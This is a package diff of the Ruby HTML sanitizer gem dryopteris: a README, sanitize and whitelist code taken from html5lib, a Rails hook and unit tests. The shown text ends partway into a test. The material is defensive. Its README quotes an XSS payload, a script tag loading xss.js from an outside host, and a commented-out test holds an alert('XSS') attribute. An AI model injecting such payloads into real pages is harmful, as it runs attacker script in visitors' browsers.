jmcnevin-dryopteris 0.1.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
data/README.markdown ADDED
@@ -0,0 +1,97 @@
+ Dryopteris
+ ==========
+
+ Dryopteris erythrosora is the Japanese Shield Fern. It can also be used to sanitize HTML to help prevent XSS attacks.
+
+ * [Dryopteris erythrosora](http://en.wikipedia.org/wiki/Dryopteris_erythrosora)
+ * [XSS Attacks](http://en.wikipedia.org/wiki/Cross-site_scripting)
+
+ Usage
+ -----
+
+ Let's say you run a web site, and you allow people to post HTML snippets.
+
+ Let's also say some script-kiddie from Norland posts this to your site, in an effort to swipe some credit cards:
+
+     <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
+
+ Oooh, that could be bad. Here's how to fix it:
+
+     safe_html_snippet = Dryopteris.sanitize(dangerous_html_snippet)
+
+ Yeah, it's that easy.
+
+ In this example, <tt>safe\_html\_snippet</tt> will have all of its __broken markup fixed__ by libxml2, and it will also be completely __sanitized of harmful tags and attributes__. That's twice as clean!
+
+
+ Sanitization Usage
+ -----
+
+ You're still here? Ok, let me tell you a little something about the two different methods of sanitizing that Dryopteris offers.
+
+ ### Fragments
+
+ The first method is for _html fragments_, which are small snippets of markup such as those used in forum posts, emails and homework assignments.
+
+ Usage is the same as above:
+
+     safe_html_snippet = Dryopteris.sanitize(dangerous_html_snippet)
+
+ Generally speaking, unless you expect to have &lt;html&gt; and &lt;body&gt; tags in your HTML, this is the sanitizing method to use.
+
+ The only real limitation on this method is that the snippet must be a string object. (Support for IO objects was sacrificed at the altar of fixer-uppery-ness. If you need to sanitize data that's coming from an IO object, either a socket or a file, check out the next section on __Documents__.)
+
+ ### Documents
+
+ Sometimes you need to sanitize an entire HTML document. (Well, maybe not _you_, but other people, certainly.)
+
+     safe_html_document = Dryopteris.sanitize_document(dangerous_html_document)
+
+ The returned string will contain exactly one (1) well-formed HTML document, with all broken HTML fixed and all harmful tags and attributes removed.
+
+ Coolness: <tt>dangerous\_html\_document</tt> can be a string OR an IO object (a file, or a socket, or ...), which makes it particularly easy to sanitize large numbers of docs.
+
+ Whitewashing Usage
+ -----
+
+ ### Whitewashing Fragments
+
+ Other times, you may want to remove all styling, attributes and invalid HTML tags. I like to call this "whitewashing", since it's putting a new layer of paint on top of the HTML input to make it look nice.
+
+ One use case for this feature is to clean up HTML that was cut-and-pasted from Microsoft(tm) Word into a WYSIWYG editor/textarea. Microsoft's editor is famous for injecting all kinds of cruft into its HTML output. Who needs that? Certainly not me.
+
+     whitewashed_html = Dryopteris.whitewash(ugly_microsoft_html_snippet)
+
+ Please note that whitewashing also implicitly sanitizes your HTML, as it uses the same HTML tag whitelist as <tt>sanitize()</tt>. Its implementation is:
+
+ 1. unless the tag is on the whitelist, remove it from the document
+ 2. if the tag has an XML namespace on it, remove it from the document
+ 3. remove all attributes from the node
+
+ ### Whitewashing Documents
+
+ Also note the existence of <tt>whitewash\_document</tt>, which is analogous to <tt>sanitize\_document</tt>.
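
The three whitewash rules above can be sketched on a toy node structure. This is an illustrative sketch only: `Node` and `WHITELIST` here are hypothetical stand-ins (Dryopteris itself walks real Nokogiri nodes and uses a much larger whitelist).

```ruby
# Toy sketch of the whitewash rules; Node and WHITELIST are illustrative
# stand-ins, not part of Dryopteris.
Node = Struct.new(:name, :namespace, :attributes, :children)

WHITELIST = { "p" => true, "b" => true }

def whitewash_node(node)
  return nil unless WHITELIST[node.name]  # rule 1: drop non-whitelisted tags
  return nil if node.namespace            # rule 2: drop namespaced tags
  node.attributes = {}                    # rule 3: strip all attributes
  node.children = node.children.map { |c| whitewash_node(c) }.compact
  node
end

dirty = Node.new("p", nil, { "style" => "x" },
                 [Node.new("script", nil, {}, []),
                  Node.new("b", nil, {}, [])])
clean = whitewash_node(dirty)
# clean.attributes => {}, and the <script> child is gone
```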
+
+ Standing on the Shoulders of Giants
+ -----
+
+ Dryopteris uses [Nokogiri](http://nokogiri.rubyforge.org/) and [libxml2](http://xmlsoft.org/), so it's fast.
+
+ Dryopteris also takes its tag and tag attribute whitelists and its CSS sanitizer directly from [html5lib](http://code.google.com/p/html5lib/).
+
+
+ Authors
+ -----
+ * [Bryan Helmkamp](http://www.brynary.com/)
+ * [Mike Dalessio](http://mike.daless.io/) ([twitter](http://twitter.com/flavorjones))
+
+
+ Quotes About Dryopteris
+ -----
+
+ > "dryopteris shields you from xss attacks using nokogiri and NY attitude"
+ > - [hasmanyjosh](http://blog.hasmanythrough.com/)
+
+ > "I just wanted to say thank you for your dryopteris plugin. It is by far the best sanitization I've found."
+ > - [catalystmediastudios](http://github.com/catalystmediastudios)
+
data/VERSION.yml ADDED
@@ -0,0 +1,4 @@
+ ---
+ :major: 0
+ :minor: 0
+ :patch: 0
data/lib/dryopteris.rb ADDED
@@ -0,0 +1,12 @@
+ $LOAD_PATH.unshift(File.expand_path(File.dirname(__FILE__))) unless $LOAD_PATH.include?(File.expand_path(File.dirname(__FILE__)))
+
+ require 'rubygems'
+ gem 'nokogiri', '>=1.2.4'
+ require 'nokogiri'
+
+ require "dryopteris/whitelist"
+ require "dryopteris/sanitize"
+
+ module Dryopteris
+   VERSION = '0.1'
+ end
data/lib/dryopteris/rails_extension.rb ADDED
@@ -0,0 +1,46 @@
+ require "dryopteris"
+
+ module Dryopteris
+   module RailsExtension
+     def self.included(base)
+       base.extend(ClassMethods)
+
+       # sets up default of stripping tags for all fields
+       base.class_eval do
+         before_save :sanitize_fields
+         class_inheritable_reader :dryopteris_options
+       end
+     end
+
+     module ClassMethods
+       def sanitize_fields(options = {})
+         write_inheritable_attribute(:dryopteris_options, {
+           :except => (options[:except] || []),
+           :allow_tags => (options[:allow_tags] || [])
+         })
+       end
+
+       alias_method :sanitize_field, :sanitize_fields
+     end
+
+     def sanitize_fields
+       self.class.columns.each do |column|
+         next unless (column.type == :string || column.type == :text)
+
+         field = column.name.to_sym
+         value = self[field]
+
+         if dryopteris_options && dryopteris_options[:except].include?(field)
+           next
+         elsif dryopteris_options && dryopteris_options[:allow_tags].include?(field)
+           self[field] = Dryopteris.sanitize(value)
+         else
+           self[field] = Dryopteris.strip_tags(value)
+         end
+       end
+     end
+   end
+ end
data/lib/dryopteris/sanitize.rb ADDED
@@ -0,0 +1,175 @@
+ require 'cgi'
+
+ module Dryopteris
+
+   class << self
+     def strip_tags(string_or_io, encoding=nil)
+       return nil if string_or_io.nil?
+       return "" if string_or_io.strip.size == 0
+
+       doc = Nokogiri::HTML.parse(string_or_io, nil, encoding)
+       body_element = doc.at("/html/body")
+       return "" if body_element.nil?
+       body_element.inner_text
+     end
+
+     def whitewash(string, encoding=nil)
+       return nil if string.nil?
+       return "" if string.strip.size == 0
+
+       string = "<html><body>" + string + "</body></html>"
+       doc = Nokogiri::HTML.parse(string, nil, encoding)
+       body = doc.xpath("/html/body").first
+       return "" if body.nil?
+       body.children.each do |node|
+         traverse_conditionally_top_down(node, :whitewash_node)
+       end
+       body.children.map { |x| x.to_xml }.join
+     end
+
+     def whitewash_document(string_or_io, encoding=nil)
+       return nil if string_or_io.nil?
+       return "" if string_or_io.strip.size == 0
+
+       doc = Nokogiri::HTML.parse(string_or_io, nil, encoding)
+       body = doc.xpath("/html/body").first
+       return "" if body.nil?
+       body.children.each do |node|
+         traverse_conditionally_top_down(node, :whitewash_node)
+       end
+       body.children.map { |x| x.to_xml }.join
+     end
+
+     def sanitize(string, encoding=nil)
+       return nil if string.nil?
+       return "" if string.strip.size == 0
+
+       string = "<html><body>" + string + "</body></html>"
+       doc = Nokogiri::HTML.parse(string, nil, encoding)
+       body = doc.xpath("/html/body").first
+       return "" if body.nil?
+       body.children.each do |node|
+         traverse_conditionally_top_down(node, :sanitize_node)
+       end
+       body.children.map { |x| x.to_xml }.join
+     end
+
+     def sanitize_document(string_or_io, encoding=nil)
+       return nil if string_or_io.nil?
+       return "" if string_or_io.strip.size == 0
+
+       doc = Nokogiri::HTML.parse(string_or_io, nil, encoding)
+       elements = doc.xpath("/html/head/*", "/html/body/*")
+       return "" if (elements.nil? || elements.empty?)
+       elements.each do |node|
+         traverse_conditionally_top_down(node, :sanitize_node)
+       end
+       doc.root.to_xml
+     end
+
+     private
+
+     def traverse_conditionally_top_down(node, method_name)
+       return if send(method_name, node)
+       node.children.each { |j| traverse_conditionally_top_down(j, method_name) }
+     end
+
+     def remove_tags_from_node(node)
+       replacement_killer = Nokogiri::XML::Text.new(node.text, node.document)
+       node.add_next_sibling(replacement_killer)
+       node.remove
+       return true
+     end
+
+     def sanitize_node(node)
+       case node.type
+       when 1 # Nokogiri::XML::Node::ELEMENT_NODE
+         if HashedWhiteList::ALLOWED_ELEMENTS[node.name]
+           node.attributes.each do |attr|
+             node.remove_attribute(attr.first) unless HashedWhiteList::ALLOWED_ATTRIBUTES[attr.first]
+           end
+           node.attributes.each do |attr|
+             if HashedWhiteList::ATTR_VAL_IS_URI[attr.first]
+               # this block lifted nearly verbatim from HTML5 sanitization
+               val_unescaped = CGI.unescapeHTML(attr.last.to_s).gsub(/`|[\000-\040\177\s]+|\302[\200-\240]/,'').downcase
+               if val_unescaped =~ /^[a-z0-9][-+.a-z0-9]*:/ and HashedWhiteList::ALLOWED_PROTOCOLS[val_unescaped.split(':')[0]].nil?
+                 node.remove_attribute(attr.first)
+               end
+             end
+           end
+           if node.attributes['style']
+             node['style'] = sanitize_css(node.attributes['style'])
+           end
+           return false
+         end
+       when 3 # Nokogiri::XML::Node::TEXT_NODE
+         return false
+       when 4 # Nokogiri::XML::Node::CDATA_SECTION_NODE
+         return false
+       end
+       replacement_killer = Nokogiri::XML::Text.new(node.to_s, node.document)
+       node.add_next_sibling(replacement_killer)
+       node.remove
+       return true
+     end
+
+     def whitewash_node(node)
+       case node.type
+       when 1 # Nokogiri::XML::Node::ELEMENT_NODE
+         if HashedWhiteList::ALLOWED_ELEMENTS[node.name]
+           node.attributes.each { |attr| node.remove_attribute(attr.first) }
+           has_no_namespaces = true
+           begin
+             has_no_namespaces = node.namespaces.empty?
+           rescue
+             # older versions of nokogiri raise an exception when there
+             # is a namespace on the node that is not declared with an href.
+             # see http://github.com/tenderlove/nokogiri/commit/395d7971304e1489e92c494b9c50609f4b4c4ab0
+             has_no_namespaces = false
+           end
+           return false if has_no_namespaces
+         end
+       when 3 # Nokogiri::XML::Node::TEXT_NODE
+         return false
+       when 4 # Nokogiri::XML::Node::CDATA_SECTION_NODE
+         return false
+       end
+       node.remove
+       return true
+     end
+
+     # this was lifted nearly verbatim from html5
+     def sanitize_css(style)
+       # disallow urls
+       style = style.to_s.gsub(/url\s*\(\s*[^\s)]+?\s*\)\s*/, ' ')
+
+       # gauntlet
+       return '' unless style =~ /^([:,;#%.\sa-zA-Z0-9!]|\w-\w|\'[\s\w]+\'|\"[\s\w]+\"|\([\d,\s]+\))*$/
+       return '' unless style =~ /^\s*([-\w]+\s*:[^:;]*(;\s*|$))*$/
+
+       clean = []
+       style.scan(/([-\w]+)\s*:\s*([^:;]*)/) do |prop, val|
+         next if val.empty?
+         prop.downcase!
+         if HashedWhiteList::ALLOWED_CSS_PROPERTIES[prop]
+           clean << "#{prop}: #{val};"
+         elsif %w[background border margin padding].include?(prop.split('-')[0])
+           clean << "#{prop}: #{val};" unless val.split().any? do |keyword|
+             HashedWhiteList::ALLOWED_CSS_KEYWORDS[keyword].nil? and
+               keyword !~ /^(#[0-9a-f]+|rgb\(\d+%?,\d*%?,?\d*%?\)?|\d{0,2}\.?\d{0,2}(cm|em|ex|in|mm|pc|pt|px|%|,|\))?)$/
+           end
+         elsif HashedWhiteList::ALLOWED_SVG_PROPERTIES[prop]
+           clean << "#{prop}: #{val};"
+         end
+       end
+
+       style = clean.join(' ')
+     end
+
+   end # self
+
+ end
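
The URI-protocol check inside `sanitize_node` can be exercised standalone. The sketch below reuses its unescape-strip-downcase logic on attribute values; `ALLOWED` and `bad_uri?` are illustrative stand-ins (the real code also strips the `\302\200`-`\302\240` byte range and consults `HashedWhiteList::ALLOWED_PROTOCOLS`).

```ruby
require 'cgi'

# Stand-in for the protocol whitelist; the real list is much longer.
ALLOWED = { "http" => true, "https" => true, "mailto" => true }

# Returns truthy when an attribute value smuggles in a disallowed protocol,
# mirroring sanitize_node: HTML-unescape, strip control chars/whitespace
# (defeating tricks like "java\tscript:"), downcase, then check the scheme.
def bad_uri?(val)
  unescaped = CGI.unescapeHTML(val.to_s)
                 .gsub(/`|[\000-\040\177\s]+/, '')
                 .downcase
  unescaped =~ /\A[a-z0-9][-+.a-z0-9]*:/ && !ALLOWED[unescaped.split(':')[0]]
end

bad_uri?("java\tscript:alert(1)")  # truthy: tab stripped, "javascript" exposed
bad_uri?("http://example.com/")    # falsy: scheme is whitelisted
bad_uri?("relative/path")          # falsy: no scheme at all
```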
data/lib/dryopteris/whitelist.rb ADDED
@@ -0,0 +1,159 @@
+ #
+ # HTML whitelist lifted from HTML5 sanitizer code
+ # http://code.google.com/p/html5lib/
+ #
+
+ module Dryopteris
+   module WhiteList
+     # <html5_license>
+     #
+     # Copyright (c) 2006-2008 The Authors
+     #
+     # Contributors:
+     # James Graham - jg307@cam.ac.uk
+     # Anne van Kesteren - annevankesteren@gmail.com
+     # Lachlan Hunt - lachlan.hunt@lachy.id.au
+     # Matt McDonald - kanashii@kanashii.ca
+     # Sam Ruby - rubys@intertwingly.net
+     # Ian Hickson (Google) - ian@hixie.ch
+     # Thomas Broyer - t.broyer@ltgt.net
+     # Jacques Distler - distler@golem.ph.utexas.edu
+     # Henri Sivonen - hsivonen@iki.fi
+     # The Mozilla Foundation (contributions from Henri Sivonen since 2008)
+     #
+     # Permission is hereby granted, free of charge, to any person
+     # obtaining a copy of this software and associated documentation
+     # files (the "Software"), to deal in the Software without
+     # restriction, including without limitation the rights to use, copy,
+     # modify, merge, publish, distribute, sublicense, and/or sell copies
+     # of the Software, and to permit persons to whom the Software is
+     # furnished to do so, subject to the following conditions:
+     #
+     # The above copyright notice and this permission notice shall be
+     # included in all copies or substantial portions of the Software.
+     #
+     # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+     # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+     # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
+     # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
+     # HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
+     # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+     # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
+     # DEALINGS IN THE SOFTWARE.
+     #
+     # </html5_license>
+
+     ACCEPTABLE_ELEMENTS = %w[a abbr acronym address area b big blockquote br
+       button caption center cite code col colgroup dd del dfn dir div dl dt
+       em fieldset font form h1 h2 h3 h4 h5 h6 hr i img input ins kbd label
+       legend li map menu ol optgroup option p pre q s samp select small span
+       strike strong sub sup table tbody td textarea tfoot th thead tr tt u
+       ul var]
+
+     MATHML_ELEMENTS = %w[maction math merror mfrac mi mmultiscripts mn mo
+       mover mpadded mphantom mprescripts mroot mrow mspace msqrt mstyle msub
+       msubsup msup mtable mtd mtext mtr munder munderover none]
+
+     SVG_ELEMENTS = %w[a animate animateColor animateMotion animateTransform
+       circle defs desc ellipse font-face font-face-name font-face-src g
+       glyph hkern image linearGradient line marker metadata missing-glyph
+       mpath path polygon polyline radialGradient rect set stop svg switch
+       text title tspan use]
+
+     ACCEPTABLE_ATTRIBUTES = %w[abbr accept accept-charset accesskey action
+       align alt axis border cellpadding cellspacing char charoff charset
+       checked cite class clear cols colspan color compact coords datetime
+       dir disabled enctype for frame headers height href hreflang hspace id
+       ismap label lang longdesc maxlength media method multiple name nohref
+       noshade nowrap prompt readonly rel rev rows rowspan rules scope
+       selected shape size span src start style summary tabindex target title
+       type usemap valign value vspace width xml:lang]
+
+     MATHML_ATTRIBUTES = %w[actiontype align columnalign columnalign
+       columnalign columnlines columnspacing columnspan depth display
+       displaystyle equalcolumns equalrows fence fontstyle fontweight frame
+       height linethickness lspace mathbackground mathcolor mathvariant
+       mathvariant maxsize minsize other rowalign rowalign rowalign rowlines
+       rowspacing rowspan rspace scriptlevel selection separator stretchy
+       width width xlink:href xlink:show xlink:type xmlns xmlns:xlink]
+
+     SVG_ATTRIBUTES = %w[accent-height accumulate additive alphabetic
+       arabic-form ascent attributeName attributeType baseProfile bbox begin
+       by calcMode cap-height class color color-rendering content cx cy d dx
+       dy descent display dur end fill fill-rule font-family font-size
+       font-stretch font-style font-variant font-weight from fx fy g1 g2
+       glyph-name gradientUnits hanging height horiz-adv-x horiz-origin-x id
+       ideographic k keyPoints keySplines keyTimes lang marker-end
+       marker-mid marker-start markerHeight markerUnits markerWidth
+       mathematical max min name offset opacity orient origin
+       overline-position overline-thickness panose-1 path pathLength points
+       preserveAspectRatio r refX refY repeatCount repeatDur
+       requiredExtensions requiredFeatures restart rotate rx ry slope stemh
+       stemv stop-color stop-opacity strikethrough-position
+       strikethrough-thickness stroke stroke-dasharray stroke-dashoffset
+       stroke-linecap stroke-linejoin stroke-miterlimit stroke-opacity
+       stroke-width systemLanguage target text-anchor to transform type u1
+       u2 underline-position underline-thickness unicode unicode-range
+       units-per-em values version viewBox visibility width widths x
+       x-height x1 x2 xlink:actuate xlink:arcrole xlink:href xlink:role
+       xlink:show xlink:title xlink:type xml:base xml:lang xml:space xmlns
+       xmlns:xlink y y1 y2 zoomAndPan]
+
+     ATTR_VAL_IS_URI = %w[href src cite action longdesc xlink:href xml:base]
+
+     ACCEPTABLE_CSS_PROPERTIES = %w[azimuth background-color
+       border-bottom-color border-collapse border-color border-left-color
+       border-right-color border-top-color clear color cursor direction
+       display elevation float font font-family font-size font-style
+       font-variant font-weight height letter-spacing line-height overflow
+       pause pause-after pause-before pitch pitch-range richness speak
+       speak-header speak-numeral speak-punctuation speech-rate stress
+       text-align text-decoration text-indent unicode-bidi vertical-align
+       voice-family volume white-space width]
+
+     ACCEPTABLE_CSS_KEYWORDS = %w[auto aqua black block blue bold both bottom
+       brown center collapse dashed dotted fuchsia gray green !important
+       italic left lime maroon medium none navy normal nowrap olive pointer
+       purple red right solid silver teal top transparent underline white
+       yellow]
+
+     ACCEPTABLE_SVG_PROPERTIES = %w[fill fill-opacity fill-rule stroke
+       stroke-width stroke-linecap stroke-linejoin stroke-opacity]
+
+     ACCEPTABLE_PROTOCOLS = %w[ed2k ftp http https irc mailto news gopher nntp
+       telnet webcal xmpp callto feed urn aim rsync tag ssh sftp rtsp afs]
+
+     # subclasses may define their own versions of these constants
+     ALLOWED_ELEMENTS = ACCEPTABLE_ELEMENTS + MATHML_ELEMENTS + SVG_ELEMENTS
+     ALLOWED_ATTRIBUTES = ACCEPTABLE_ATTRIBUTES + MATHML_ATTRIBUTES + SVG_ATTRIBUTES
+     ALLOWED_CSS_PROPERTIES = ACCEPTABLE_CSS_PROPERTIES
+     ALLOWED_CSS_KEYWORDS = ACCEPTABLE_CSS_KEYWORDS
+     ALLOWED_SVG_PROPERTIES = ACCEPTABLE_SVG_PROPERTIES
+     ALLOWED_PROTOCOLS = ACCEPTABLE_PROTOCOLS
+
+     VOID_ELEMENTS = %w[
+       base
+       link
+       meta
+       hr
+       br
+       img
+       embed
+       param
+       area
+       col
+       input
+     ]
+   end
+
+   module HashedWhiteList
+     # turn each of the whitelist arrays into a hash for faster lookup
+     WhiteList.constants.each do |constant|
+       next unless WhiteList.module_eval("#{constant}").is_a?(Array)
+       module_eval <<-CODE
+         #{constant} = {}
+         WhiteList::#{constant}.each { |c| #{constant}[c] = true ; #{constant}[c.downcase] = true }
+       CODE
+     end
+   end
+ end
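
The `HashedWhiteList` module above converts each whitelist array into a hash so that membership tests are O(1) lookups instead of O(n) array scans. The same transformation can be sketched without `module_eval`, using an abbreviated stand-in for the real element list:

```ruby
# Abbreviated stand-in for the real ACCEPTABLE_ELEMENTS list.
ACCEPTABLE_ELEMENTS = %w[a b em strong p]

# Build a lookup hash keyed by both the original and downcased names,
# as HashedWhiteList does for every whitelist array.
ALLOWED_ELEMENTS = {}
ACCEPTABLE_ELEMENTS.each do |el|
  ALLOWED_ELEMENTS[el] = true
  ALLOWED_ELEMENTS[el.downcase] = true
end

ALLOWED_ELEMENTS["em"]      # => true
ALLOWED_ELEMENTS["script"]  # => nil, so the tag gets stripped
```

The downcased duplicate keys are cheap insurance: lookups succeed whether the parser reports tag names in their original or lowercased form.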
data/test/helper.rb ADDED
@@ -0,0 +1,8 @@
+ require 'test/unit'
+ require File.expand_path(File.join(File.dirname(__FILE__), "..", "lib", "dryopteris"))
+
+ if defined? Nokogiri::VERSION_INFO
+   puts "=> running with Nokogiri #{Nokogiri::VERSION_INFO.inspect}"
+ else
+   puts "=> running with Nokogiri #{Nokogiri::VERSION} / libxml #{Nokogiri::LIBXML_PARSER_VERSION}"
+ end
data/test/html5/test_sanitizer.rb ADDED
@@ -0,0 +1,185 @@
+ #
+ # these tests taken from the HTML5 sanitization project and modified for use with Dryopteris
+ # see the original here: http://code.google.com/p/html5lib/source/browse/ruby/test/test_sanitizer.rb
+ #
+ # license text at the bottom of this file
+ #
+ require File.expand_path(File.join(File.dirname(__FILE__), '..', 'helper'))
+
+ class SanitizeTest < Test::Unit::TestCase
+   include Dryopteris
+
+   def sanitize_html(stream)
+     Dryopteris.sanitize(stream)
+   end
+
+   def sanitize_doc(stream)
+     Dryopteris.sanitize_document(stream)
+   end
+
+   def check_sanitization(input, htmloutput, xhtmloutput, rexmloutput)
+     # libxml uses double-quotes, so let's swappo-boppo our quotes before comparing.
+     assert_equal htmloutput, sanitize_html(input).gsub(/"/,"'"), input
+
+     doc = sanitize_doc(input).gsub(/"/,"'")
+     assert doc.include?(htmloutput), "#{input}:\n#{doc}\nshould include:\n#{htmloutput}"
+   end
+
+   WhiteList::ALLOWED_ELEMENTS.each do |tag_name|
+     define_method "test_should_allow_#{tag_name}_tag" do
+       input = "<#{tag_name} title='1'>foo <bad>bar</bad> baz</#{tag_name}>"
+       htmloutput = "<#{tag_name.downcase} title='1'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</#{tag_name.downcase}>"
+       xhtmloutput = "<#{tag_name} title='1'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</#{tag_name}>"
+       rexmloutput = xhtmloutput
+
+       ##
+       ## these special cases are HTML5-tokenizer-dependent.
+       ## libxml2 cleans up HTML differently, and I trust that.
+       ##
+       # if %w[caption colgroup optgroup option tbody td tfoot th thead tr].include?(tag_name)
+       #   htmloutput = "foo &lt;bad&gt;bar&lt;/bad&gt; baz"
+       #   xhtmloutput = htmloutput
+       # elsif tag_name == 'col'
+       #   htmloutput = "foo &lt;bad&gt;bar&lt;/bad&gt; baz"
+       #   xhtmloutput = htmloutput
+       #   rexmloutput = "<col title='1' />"
+       # elsif tag_name == 'table'
+       #   htmloutput = "foo &lt;bad&gt;bar&lt;/bad&gt;baz<table title='1'> </table>"
+       #   xhtmloutput = htmloutput
+       # elsif tag_name == 'image'
+       #   htmloutput = "<image title='1'/>foo &lt;bad&gt;bar&lt;/bad&gt; baz"
+       #   xhtmloutput = htmloutput
+       #   rexmloutput = "<image title='1'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</image>"
+       if WhiteList::VOID_ELEMENTS.include?(tag_name)
+         if Nokogiri::LIBXML_VERSION <= "2.6.16"
+           htmloutput = "<#{tag_name} title='1'/><p>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
+         else
+           htmloutput = "<#{tag_name} title='1'/>foo &lt;bad&gt;bar&lt;/bad&gt; baz"
+         end
+         xhtmloutput = htmloutput
+         # htmloutput += '<br/>' if tag_name == 'br'
+         rexmloutput = "<#{tag_name} title='1' />"
+       end
+       check_sanitization(input, htmloutput, xhtmloutput, rexmloutput)
+     end
+   end
+
+   ##
+   ## libxml2 downcases tag names as it parses, so this is unnecessary.
+   ##
+   # WhiteList::ALLOWED_ELEMENTS.each do |tag_name|
+   #   define_method "test_should_forbid_#{tag_name.upcase}_tag" do
+   #     input = "<#{tag_name.upcase} title='1'>foo <bad>bar</bad> baz</#{tag_name.upcase}>"
+   #     output = "&lt;#{tag_name.upcase} title=\"1\"&gt;foo &lt;bad&gt;bar&lt;/bad&gt; baz&lt;/#{tag_name.upcase}&gt;"
+   #     check_sanitization(input, output, output, output)
+   #   end
+   # end
+
+   WhiteList::ALLOWED_ATTRIBUTES.each do |attribute_name|
+     next if attribute_name == 'style'
+     next if attribute_name =~ /:/ && Nokogiri::LIBXML_VERSION <= '2.6.16'
+     define_method "test_should_allow_#{attribute_name}_attribute" do
+       input = "<p #{attribute_name}='foo'>foo <bad>bar</bad> baz</p>"
+       output = "<p #{attribute_name}='foo'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
+       htmloutput = "<p #{attribute_name.downcase}='foo'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
+       check_sanitization(input, htmloutput, output, output)
+     end
+   end
+
+   ##
+   ## libxml2 downcases attributes as it parses, so this is unnecessary.
+   ##
+   # WhiteList::ALLOWED_ATTRIBUTES.each do |attribute_name|
+   #   define_method "test_should_forbid_#{attribute_name.upcase}_attribute" do
+   #     input = "<p #{attribute_name.upcase}='display: none;'>foo <bad>bar</bad> baz</p>"
+   #     output = "<p>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
+   #     check_sanitization(input, output, output, output)
+   #   end
+   # end
+
+   WhiteList::ALLOWED_PROTOCOLS.each do |protocol|
+     define_method "test_should_allow_#{protocol}_uris" do
+       input = %(<a href="#{protocol}">foo</a>)
+       output = "<a href='#{protocol}'>foo</a>"
+       check_sanitization(input, output, output, output)
+     end
+   end
+
+   WhiteList::ALLOWED_PROTOCOLS.each do |protocol|
+     define_method "test_should_allow_uppercase_#{protocol}_uris" do
+       input = %(<a href="#{protocol.upcase}">foo</a>)
+       output = "<a href='#{protocol.upcase}'>foo</a>"
+       check_sanitization(input, output, output, output)
+     end
+   end
+
+   if Nokogiri::LIBXML_VERSION > '2.6.16'
+     def test_should_handle_astral_plane_characters
+       input = "<p>&#x1d4b5; &#x1d538;</p>"
+       output = "<p>\360\235\222\265 \360\235\224\270</p>"
+       check_sanitization(input, output, output, output)
+
+       input = "<p><tspan>\360\235\224\270</tspan> a</p>"
+       output = "<p><tspan>\360\235\224\270</tspan> a</p>"
+       check_sanitization(input, output, output, output)
+     end
+   end
+
+   # This affects only NS4. Is it worth fixing?
+   # def test_javascript_includes
+   #   input = %(<div size="&{alert('XSS')}">foo</div>)
+   #   output = "<div>foo</div>"
+   #   check_sanitization(input, output, output, output)
+   # end
+
+   #html5_test_files('sanitizer').each do |filename|
+   #  JSON::parse(open(filename).read).each do |test|
+   #    define_method "test_#{test['name']}" do
+   #      check_sanitization(
+   #        test['input'],
+   #        test['output'],
+   #        test['xhtml'] || test['output'],
+   #        test['rexml'] || test['output']
+   #      )
+   #    end
+   #  end
+   #end
+ end
+
+ # <html5_license>
+ #
+ # Copyright (c) 2006-2008 The Authors
+ #
+ # Contributors:
+ # James Graham - jg307@cam.ac.uk
+ # Anne van Kesteren - annevankesteren@gmail.com
+ # Lachlan Hunt - lachlan.hunt@lachy.id.au
+ # Matt McDonald - kanashii@kanashii.ca
+ # Sam Ruby - rubys@intertwingly.net
+ # Ian Hickson (Google) - ian@hixie.ch
+ # Thomas Broyer - t.broyer@ltgt.net
+ # Jacques Distler - distler@golem.ph.utexas.edu
+ # Henri Sivonen - hsivonen@iki.fi
+ # The Mozilla Foundation (contributions from Henri Sivonen since 2008)
+ #
+ # Permission is hereby granted, free of charge, to any person
+ # obtaining a copy of this software and associated documentation files
+ # (the "Software"), to deal in the Software without restriction,
+ # including without limitation the rights to use, copy, modify, merge,
+ # publish, distribute, sublicense, and/or sell copies of the Software,
+ # and to permit persons to whom the Software is furnished to do so,
+ # subject to the following conditions:
+ #
+ # The above copyright notice and this permission notice shall be
+ # included in all copies or substantial portions of the Software.
+ #
+ # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+ # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+ # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
+ # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
+ # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
+ # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
+ # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ # SOFTWARE.
+ #
+ # </html5_license>
data/test/test_basic.rb ADDED
@@ -0,0 +1,76 @@
+ require File.expand_path(File.join(File.dirname(__FILE__), 'helper'))
+
+ class TestBasic < Test::Unit::TestCase
+
+   def test_nil
+     assert_nil Dryopteris.sanitize(nil)
+   end
+
+   def test_empty_string
+     assert_equal "", Dryopteris.sanitize("")
+   end
+
+   def test_removal_of_illegal_tag
+     html = <<-HTML
+       following this there should be no jim tag
+       <jim>jim</jim>
+       was there?
+     HTML
+     sane = Nokogiri::HTML(Dryopteris.sanitize(html))
+     assert sane.xpath("//jim").empty?
+   end
+
+   def test_removal_of_illegal_attribute
+     html = "<p class=bar foo=bar abbr=bar />"
+     sane = Nokogiri::HTML(Dryopteris.sanitize(html))
+     node = sane.xpath("//p").first
+     assert node.attributes['class']
+     assert node.attributes['abbr']
+     assert_nil node.attributes['foo']
+   end
+
+   def test_removal_of_illegal_url_in_href
+     html = <<-HTML
